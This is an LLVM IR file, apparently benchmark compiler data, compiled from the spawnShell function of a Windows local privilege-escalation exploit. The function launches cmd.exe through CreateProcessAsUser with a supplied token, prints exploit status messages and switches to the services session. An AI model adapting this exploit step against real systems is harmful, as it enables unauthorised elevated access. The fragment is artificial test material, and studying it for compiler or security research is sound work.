; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_45401.c_spawnShell.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_45401.c_spawnShell.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_6__ = type { i32, i8* }

@.str = private unnamed_addr constant [16 x i8] c"WinSta0\\Default\00", align 1
@.str.1 = private unnamed_addr constant [28 x i8] c"C:\\Windows\\System32\\cmd.exe\00", align 1
@FALSE = common dso_local global i32 0, align 4
@CREATE_NEW_CONSOLE = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [56 x i8] c"\0A[-] Failed to execute command (%d) Run exploit again\0A\0A\00", align 1
@.str.3 = private unnamed_addr constant [35 x i8] c"\0A[+] Executed command successfully\00", align 1
@.str.4 = private unnamed_addr constant [31 x i8] c"\0A[*] Switching session . . .\0A\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @spawnShell(i32 %0) #0 {
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca %struct.TYPE_6__, align 8
  %5 = alloca %struct.TYPE_6__, align 8
  store i32 %0, i32* %3, align 4
  %6 = call i32 @ZeroMemory(%struct.TYPE_6__* %4, i32 16)
  %7 = call i32 @ZeroMemory(%struct.TYPE_6__* %5, i32 16)
  %8 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %4, i32 0, i32 0
  store i32 16, i32* %8, align 8
  %9 = getelementptr inbounds %struct.TYPE_6__, %struct.TYPE_6__* %4, i32 0, i32 1
  store i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str, i64 0, i64 0), i8** %9, align 8
  %10 = load i32, i32* %3, align 4
  %11 = load i32, i32* @FALSE, align 4
  %12 = load i32, i32* @CREATE_NEW_CONSOLE, align 4
  %13 = call i32 @CreateProcessAsUser(i32 %10, i32* null, i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.1, i64 0, i64 0), i32* null, i32* null, i32 %11, i32 %12, i32* null, i32* null, %struct.TYPE_6__* %4, %struct.TYPE_6__* %5)
  %14 = icmp ne i32 %13, 0
  br i1 %14, label %18, label %15

15:                                               ; preds = %1
  %16 = call i32 (...) @GetLastError()
  %17 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([56 x i8], [56 x i8]* @.str.2, i64 0, i64 0), i32 %16)
  store i32 -1, i32* %2, align 4
  br label %22

18:                                               ; preds = %1
  %19 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str.3, i64 0, i64 0))
  %20 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str.4, i64 0, i64 0))
  %21 = call i32 (...) @WinStationSwitchToServicesSession()
  store i32 0, i32* %2, align 4
  br label %22

22:                                               ; preds = %18, %15
  %23 = load i32, i32* %2, align 4
  ret i32 %23
}

declare dso_local i32 @ZeroMemory(%struct.TYPE_6__*, i32) #1

declare dso_local i32 @CreateProcessAsUser(i32, i32*, i8*, i32*, i32*, i32, i32, i32*, i32*, %struct.TYPE_6__*, %struct.TYPE_6__*) #1

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @GetLastError(...) #1

declare dso_local i32 @WinStationSwitchToServicesSession(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
